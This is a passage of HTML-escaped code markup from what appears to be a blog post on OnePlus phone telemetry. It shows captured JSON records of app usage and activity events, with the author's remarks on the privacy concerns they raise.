                &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1484081525486&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1484081603191&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;],&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
                &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1484081603424&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1484081619211&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;],&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
                &lt;/span&gt;&lt;span class=&quot;err&quot;&gt;...&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;],&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;it&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
        &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;},&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;258cfeb1&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;pn&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;com.microsoft.office.outlook170&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;pvc&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;170&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;tk&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
                &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1484084321735&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1484084333336&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;],&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
                &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1484084682578&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1484084683668&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;],&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
                &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1484084685843&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1484084688985&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;],&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
                &lt;/span&gt;&lt;span class=&quot;err&quot;&gt;...&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;],&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;it&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
        &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;},&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;err&quot;&gt;...&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
    &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;

&lt;p&gt;Those are timestamp ranges (again, unix epoch in milliseconds) of when I opened and closed applications on my phone.
From this data we can see that on Tuesday, 10th Jan 2017, I had &lt;a href=&quot;https://slack.com/&quot;&gt;Slack&lt;/a&gt; open between &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;20:25:40 UTC&lt;/code&gt; and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;20:25:52 UTC&lt;/code&gt;, and the Microsoft Outlook app open between &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;21:38:41 UTC&lt;/code&gt; and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;21:38:53 UTC&lt;/code&gt;, to take just two examples, again stamped with my phone’s serial number.&lt;/p&gt;

&lt;p&gt;It gets &lt;em&gt;even worse&lt;/em&gt;.&lt;/p&gt;

&lt;figure class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-json&quot; data-lang=&quot;json&quot;&gt;&lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
    &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;ty&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;2&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
    &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;dl&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[{&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;258cfeb1&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;pi&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;12795&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;si&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;127951484342058637&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;ts&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1484342058637&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;pn&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;com.android.chrome&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;pvn&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;55.0.2883.91&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;pvc&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;288309101&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;cn&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;ChromeTabbedActivity&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;en&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;start&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;aed&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[],&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;sa&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;kc&quot;&gt;true&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;it&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;rv&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;OnePlus2Oxygen_14.A.27_GLO_027_1612271635&quot;&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
        &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;},&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;err&quot;&gt;...&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;258cfeb1&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;pi&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;4143&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;si&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;41431484342115589&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;ts&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1484342115589&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;pn&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;com.android.systemui&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;pvn&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;1.1.0&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;pvc&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;cn&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;RecentsActivity&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;en&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;stop&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;aed&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[],&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;sa&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;kc&quot;&gt;true&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;it&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;rv&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;OnePlus2Oxygen_14.A.27_GLO_027_1612271635&quot;&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
        &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;},&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;258cfeb1&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;pi&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;26449&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;si&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;264491484342115620&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;ts&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1484342115620&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;pn&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;com.android.settings&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;pvn&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;6.0.1&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;pvc&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;23&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;cn&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;WifiSettingsActivity&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;en&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;start&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;aed&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[],&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;sa&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;kc&quot;&gt;true&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;it&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;rv&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;OnePlus2Oxygen_14.A.27_GLO_027_1612271635&quot;&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
        &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;},&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;err&quot;&gt;...&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;258cfeb1&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;pi&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;2608&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;si&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;26081484346421908&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;ts&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1484346421908&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;pn&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;com.android.settings&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;pvn&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;6.0.1&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;pvc&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;23&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;cn&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;Settings&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;en&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;start&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;aed&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[],&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;sa&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;kc&quot;&gt;true&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;it&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
            &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;rv&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;OnePlus2Oxygen_14.A.27_GLO_027_1612271635&quot;&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
        &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;},&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;err&quot;&gt;...&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
    &lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
